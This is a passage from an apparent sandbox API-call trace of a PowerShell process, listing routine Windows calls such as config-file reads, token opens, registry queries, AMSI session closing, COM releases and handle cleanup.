(normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xdbdcdc | out: lpFileInformation=0xdbdcdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0186.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0186.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0186.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbdc14) returned 1 [0186.939] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x84c [0186.939] GetFileType (hFile=0x84c) returned 0x1 [0186.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbdc10) returned 1 [0186.939] GetFileType (hFile=0x84c) returned 0x1 [0186.955] GetFileSize (in: hFile=0x84c, lpFileSizeHigh=0xdbdcd0 | out: lpFileSizeHigh=0xdbdcd0*=0x0) returned 0x8c8f [0186.956] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbdc8c, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbdc8c*=0x1000, lpOverlapped=0x0) returned 1 [0187.028] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbdb38, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbdb38*=0x1000, lpOverlapped=0x0) returned 1 [0187.030] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbd9ec, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbd9ec*=0x1000, lpOverlapped=0x0) returned 1 [0187.031] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbd9ec, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbd9ec*=0x1000, lpOverlapped=0x0) returned 1 [0187.031] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbd9ec, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbd9ec*=0x1000, lpOverlapped=0x0) returned 1 [0187.032] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbd924, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbd924*=0x1000, lpOverlapped=0x0) returned 1 [0187.035] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbdaa8, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbdaa8*=0x1000, lpOverlapped=0x0) returned 1 [0187.036] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbd9b4, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbd9b4*=0x1000, lpOverlapped=0x0) returned 1 [0187.037] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbd9b4, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbd9b4*=0xc8f, lpOverlapped=0x0) returned 1 [0187.037] ReadFile (in: hFile=0x84c, lpBuffer=0x55aee64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdbda78, lpOverlapped=0x0 | out: lpBuffer=0x55aee64*, lpNumberOfBytesRead=0xdbda78*=0x0, lpOverlapped=0x0) returned 1 [0187.037] CloseHandle (hObject=0x84c) returned 1 [0187.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xdbd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0187.039] CoTaskMemAlloc (cb=0x20c) returned 0x7b1cb50 [0187.039] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b1cb50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0187.039] CoTaskMemFree (pv=0x7b1cb50) [0187.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0187.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0187.040] GetCurrentProcess () returned 0xffffffff [0187.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbde24 | out: TokenHandle=0xdbde24*=0x84c) returned 1 [0187.043] GetCurrentProcess () returned 0xffffffff [0187.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbde24 | out: TokenHandle=0xdbde24*=0x848) returned 1 [0187.047] GetCurrentProcess () returned 0xffffffff [0187.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbdcdc | out: TokenHandle=0xdbdcdc*=0x884) returned 1 [0187.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xdbdcd4 | out: lpFileInformation=0xdbdcd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0187.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0187.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x41, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0187.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xdbdcdc | out: lpFileInformation=0xdbdcdc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0187.051] GetCurrentProcess () returned 0xffffffff [0187.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbde24 | out: TokenHandle=0xdbde24*=0x83c) returned 1 [0187.052] GetCurrentProcess () returned 0xffffffff [0187.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbde24 | out: TokenHandle=0xdbde24*=0x840) returned 1 [0187.125] GetCurrentProcess () returned 0xffffffff [0187.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbdc84 | out: TokenHandle=0xdbdc84*=0x844) returned 1 [0187.222] GetCurrentProcess () returned 0xffffffff [0187.222] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbdc94 | out: TokenHandle=0xdbdc94*=0x630) returned 1 [0187.229] CoCreateGuid (in: pguid=0xdbe040 | out: pguid=0xdbe040*(Data1=0x2d8a1225, Data2=0x43b8, Data3=0x49e2, Data4=([0]=0x83, [1]=0xff, [2]=0x23, [3]=0x4, [4]=0xdc, [5]=0x2e, [6]=0x75, [7]=0xa2))) returned 0x0 [0187.235] ReportEventW (hEventLog=0x7a10004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x55cc9f0*="Stopped", lpRawData=0x55cc918) returned 1 [0187.237] AmsiCloseSession () returned 0x35b7d80 [0187.237] AmsiUninitialize () returned 0x1 [0187.321] SetEvent (hEvent=0x6fc) returned 1 [0187.926] CloseHandle (hObject=0x6fc) returned 1 [0188.591] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0188.912] CoGetContextToken (in: pToken=0xdbf740 | out: pToken=0xdbf740) returned 0x0 [0188.912] IUnknown:QueryInterface (in: This=0x12f9f70, riid=0x73b35e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdbf764 | out: ppvObject=0xdbf764*=0x12f9f7c) returned 0x0 [0188.913] IComThreadingInfo:GetCurrentThreadType (in: This=0x12f9f7c, pThreadType=0xdbf7c4 | out: pThreadType=0xdbf7c4*=0) returned 0x0 [0188.913] IUnknown:Release (This=0x12f9f7c) returned 0x1 [0188.914] CoGetContextToken (in: pToken=0xdbf444 | out: pToken=0xdbf444) returned 0x0 [0188.914] IUnknown:QueryInterface (in: This=0x12f9f70, riid=0x73b35e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdbf468 | out: ppvObject=0xdbf468*=0x12f9f7c) returned 0x0 [0188.914] IComThreadingInfo:GetCurrentThreadType (in: This=0x12f9f7c, pThreadType=0xdbf494 | out: pThreadType=0xdbf494*=0) returned 0x0 [0188.914] IUnknown:Release (This=0x12f9f7c) returned 0x1 [0188.920] CoGetContextToken (in: pToken=0xdbf444 | out: pToken=0xdbf444) returned 0x0 [0188.920] IUnknown:QueryInterface (in: This=0x12f9f70, riid=0x73b35e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdbf468 | out: ppvObject=0xdbf468*=0x12f9f7c) returned 0x0 [0188.922] IComThreadingInfo:GetCurrentThreadType (in: This=0x12f9f7c, pThreadType=0xdbf494 | out: pThreadType=0xdbf494*=0) returned 0x0 [0188.922] IUnknown:Release (This=0x12f9f7c) returned 0x1 [0188.968] CoGetContextToken (in: pToken=0xdbf444 | out: pToken=0xdbf444) returned 0x0 [0188.968] IUnknown:QueryInterface (in: This=0x12f9f70, riid=0x73b35e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdbf468 | out: ppvObject=0xdbf468*=0x12f9f7c) returned 0x0 [0188.968] IComThreadingInfo:GetCurrentThreadType (in: This=0x12f9f7c, pThreadType=0xdbf494 | out: pThreadType=0xdbf494*=0) returned 0x0 [0188.968] IUnknown:Release (This=0x12f9f7c) returned 0x1 [0188.971] CoGetContextToken (in: pToken=0xdbf464 | out: pToken=0xdbf464) returned 0x0 [0188.971] IUnknown:QueryInterface (in: This=0x12f9f70, riid=0x73b35e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdbf488 | out: ppvObject=0xdbf488*=0x12f9f7c) returned 0x0 [0188.975] IComThreadingInfo:GetCurrentThreadType (in: This=0x12f9f7c, pThreadType=0xdbf4b4 | out: pThreadType=0xdbf4b4*=0) returned 0x0 [0188.975] IUnknown:Release (This=0x12f9f7c) returned 0x0 [0188.976] CoUninitialize () Thread: id = 56 os_tid = 0xa08 Thread: id = 59 os_tid = 0x3b8 Thread: id = 60 os_tid = 0xdec [0104.658] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0104.658] RoInitialize () returned 0x1 [0104.658] RoUninitialize () returned 0x0 [0146.466] CoGetContextToken (in: pToken=0x4c6f810 | out: pToken=0x4c6f810) returned 0x0 [0146.466] CoGetContextToken (in: pToken=0x4c6f790 | out: pToken=0x4c6f790) returned 0x0 [0146.466] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0146.466] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0146.466] CloseHandle (hObject=0x288) returned 1 [0146.468] CertFreeCertificateContext (pCertContext=0x75e3cb8) returned 1 [0146.469] CloseHandle (hObject=0x64c) returned 1 [0160.751] RegCloseKey (hKey=0x6f8) returned 0x0 [0162.714] CertFreeCertificateContext (pCertContext=0x75e0388) returned 1 [0188.126] CoGetContextToken (in: pToken=0x4c6f810 | out: pToken=0x4c6f810) returned 0x0 [0188.126] CoGetContextToken (in: pToken=0x4c6f790 | out: pToken=0x4c6f790) returned 0x0 [0188.126] WbemLocator:IUnknown:Release (This=0x7aeb600) returned 0x1 [0188.126] WbemLocator:IUnknown:Release (This=0x7aeb600) returned 0x0 [0188.127] IUnknown:Release (This=0x76d8c80) returned 0x0 [0188.128] CloseHandle (hObject=0x87c) returned 1 [0188.128] CloseHandle (hObject=0x880) returned 1 [0188.128] CloseHandle (hObject=0x888) returned 1 [0188.128] CloseHandle (hObject=0x828) returned 1 [0188.128] CloseHandle (hObject=0x830) returned 1 [0188.129] CloseHandle (hObject=0x6cc) returned 1 [0188.129] CloseHandle (hObject=0x6f8) returned 1 [0188.129] CloseHandle (hObject=0x6c4) returned 1 [0188.130] CloseHandle (hObject=0x6c8) returned 1 [0188.130] CloseHandle (hObject=0x874) returned 1 [0188.130] CloseHandle (hObject=0x6f4) returned 1 [0188.130] CloseHandle (hObject=0x6f0) returned 1 [0188.131] CloseHandle (hObject=0x6ec) returned 1 [0188.131] CloseHandle (hObject=0x6e8) returned 1 [0188.131] CloseHandle (hObject=0x6e4) returned 1 [0188.131] CloseHandle (hObject=0x6e0) returned 1 [0188.131] CloseHandle (hObject=0x630) returned 1 [0188.132] CloseHandle (hObject=0x6d4) returned 1 [0188.132] CloseHandle (hObject=0x844) returned 1 [0188.132] CloseHandle (hObject=0x6d0) returned 1 [0188.132] CloseHandle (hObject=0x840) returned 1 [0188.132] CloseHandle (hObject=0x82c) returned 1 [0188.133] CloseHandle (hObject=0x83c) returned 1 [0188.133] CloseHandle (hObject=0x7b0) returned 1 [0188.133] CloseHandle (hObject=0x884) returned 1 [0188.133] CloseHandle (hObject=0x78c) returned 1 [0188.133] CloseHandle (hObject=0x848) returned 1 [0188.134] CloseHandle (hObject=0x790) returned 1 [0188.134] CloseHandle (hObject=0x84c) returned 1 [0188.134] CloseHandle (hObject=0x410) returned 1 [0188.134] CloseHandle (hObject=0x40c) returned 1 [0188.134] CloseHandle (hObject=0x6dc) returned 1 [0188.135] CloseHandle (hObject=0x850) returned 1 [0188.135] CloseHandle (hObject=0x6d8) returned 1 [0188.135] CloseHandle (hObject=0x878) returned 1 [0188.135] CloseHandle (hObject=0x85c) returned 1 [0188.135] CloseHandle (hObject=0x860) returned 1 [0188.136] CloseHandle (hObject=0x864) returned 1 [0188.136] CloseHandle (hObject=0x868) returned 1 [0188.136] CloseHandle (hObject=0x86c) returned 1 [0188.136] CloseHandle (hObject=0x870) returned 1 [0188.915] EtwEventUnregister (RegHandle=0x12c94d8) returned 0x0 [0188.915] EtwEventUnregister (RegHandle=0x12c9e20) returned 0x0 [0188.915] EtwEventUnregister (RegHandle=0x7623e20) returned 0x0 [0188.915] EtwEventUnregister (RegHandle=0x76235b0) returned 0x0 [0188.916] EtwEventUnregister (RegHandle=0x7622908) returned 0x0 [0188.916] EtwEventUnregister (RegHandle=0x7623250) returned 0x0 [0188.916] EtwEventUnregister (RegHandle=0x7623ef8) returned 0x0 [0188.916] EtwEventUnregister (RegHandle=0x7623178) returned 0x0 [0188.927] LocalFree (hMem=0x7658968) returned 0x0 [0188.928] LocalFree (hMem=0x7657868) returned 0x0 [0188.945] CloseHandle (hObject=0x650) returned 1 [0188.958] CloseHandle (hObject=0x360) returned 1 [0188.959] CloseHandle (hObject=0x65c) returned 1 [0188.963] DeregisterEventSource (hEventLog=0x7a10004) returned 1 [0188.964] RegCloseKey (hKey=0x80000004) returned 0x0 [0188.965] LocalFree (hMem=0x133ac60) returned 0x0 [0188.967] CloseHandle (hObject=0x6ac) returned 1 [0188.967] UnmapViewOfFile (lpBaseAddress=0x73e0000) returned 1 [0188.969] CoGetContextToken (in: pToken=0x4c6f460 | out: pToken=0x4c6f460) returned 0x0 [0188.969] CoGetContextToken (in: pToken=0x4c6f3e0 | out: pToken=0x4c6f3e0) returned 0x0 [0188.969] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0188.969] Release () returned 0x1 [0188.970] CoGetContextToken (in: pToken=0x4c6f3e0 | out: pToken=0x4c6f3e0) returned 0x0 [0188.970] WbemDefPath:IUnknown:Release (This=0x7a9ebd8) returned 0x1 [0188.970] WbemDefPath:IUnknown:Release (This=0x7a9ebd8) returned 0x0 [0188.970] CoGetContextToken (in: pToken=0x4c6f460 | out: pToken=0x4c6f460) returned 0x0 [0188.970] CoGetContextToken (in: pToken=0x4c6f3e0 | out: pToken=0x4c6f3e0) returned 0x0 [0188.970] WbemLocator:IUnknown:Release (This=0x75e1478) returned 0x4 [0188.973] CoReleaseMarshalData (pStm=0x763bc90) returned 0x0 [0188.973] WbemLocator:IUnknown:Release (This=0x75e1478) returned 0x3 [0188.973] WbemLocator:IUnknown:Release (This=0x75e1478) returned 0x2 [0188.973] WbemLocator:IUnknown:Release (This=0x75e1478) returned 0x1 [0188.973] WbemLocator:IUnknown:Release (This=0x75e1478) returned 0x0 [0188.974] IUnknown:Release (This=0x12f9f70) returned 0x1 [0188.975] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 75 os_tid = 0x1394 Thread: id = 76 os_tid = 0x139c Thread: id = 77 os_tid = 0x13b8 Thread: id = 78 os_tid = 0x13d4 [0126.330] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0126.331] CoGetContextToken (in: pToken=0x724f774 | out: pToken=0x724f774) returned 0x0 [0126.331] CObjectContext::QueryInterface () returned 0x0 [0126.331] CObjectContext::GetCurrentThreadType () returned 0x0 [0126.331] Release () returned 0x0 [0126.331] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0126.332] CoUninitialize () [0126.332] RoInitialize () returned 0x1 [0126.332] RoUninitialize () returned 0x0 [0126.755] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0126.756] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0126.756] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0126.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x724eb10) returned 1 [0126.756] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x724eb8c | out: lpFileInformation=0x724eb8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0126.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x724eb0c) returned 1 [0126.756] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x724ec00 | out: lpdwHandle=0x724ec00) returned 0x94c [0126.992] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x50d95ac | out: lpData=0x50d95ac) returned 1 [0127.353] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x724ebd4, puLen=0x724ebd0 | out: lplpBuffer=0x724ebd4*=0x50d9648, puLen=0x724ebd0) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d9724, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d9778, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d97d4, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d9814, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d987c, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d9918, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d997c, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d99f8, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x50d96a0, puLen=0x724eb50) returned 1 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x0, puLen=0x724eb50) returned 0 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x0, puLen=0x724eb50) returned 0 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x724eb54, puLen=0x724eb50 | out: lplpBuffer=0x724eb54*=0x0, puLen=0x724eb50) returned 0 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x724eb48, puLen=0x724eb44 | out: lplpBuffer=0x724eb48*=0x50d9648, puLen=0x724eb44) returned 1 [0127.354] VerLanguageNameW (in: wLang=0x0, szLang=0x724e8d8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0127.354] VerQueryValueW (in: pBlock=0x50d95ac, lpSubBlock="\\", lplpBuffer=0x724eb58, puLen=0x724eb54 | out: lplpBuffer=0x724eb58*=0x50d95d4, puLen=0x724eb54) returned 1 [0127.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x724eb98 | out: phkResult=0x724eb98*=0x35c) returned 0x0 [0127.365] RegQueryValueExW (in: hKey=0x35c, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x724ebb8, lpData=0x0, lpcbData=0x724ebb4*=0x0 | out: lpType=0x724ebb8*=0x1, lpData=0x0, lpcbData=0x724ebb4*=0x8) returned 0x0 [0127.365] RegQueryValueExW (in: hKey=0x35c, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x724ebb8, lpData=0x50ddcd8, lpcbData=0x724ebb4*=0x8 | out: lpType=0x724ebb8*=0x1, lpData="3.0", lpcbData=0x724ebb4*=0x8) returned 0x0 [0127.367] RegCloseKey (hKey=0x35c) returned 0x0 [0127.368] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f2b8 | out: phkResult=0x724f2b8*=0x35c) returned 0x0 [0127.368] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x724f2d8, lpData=0x0, lpcbData=0x724f2d4*=0x0 | out: lpType=0x724f2d8*=0x1, lpData=0x0, lpcbData=0x724f2d4*=0x56) returned 0x0 [0127.368] 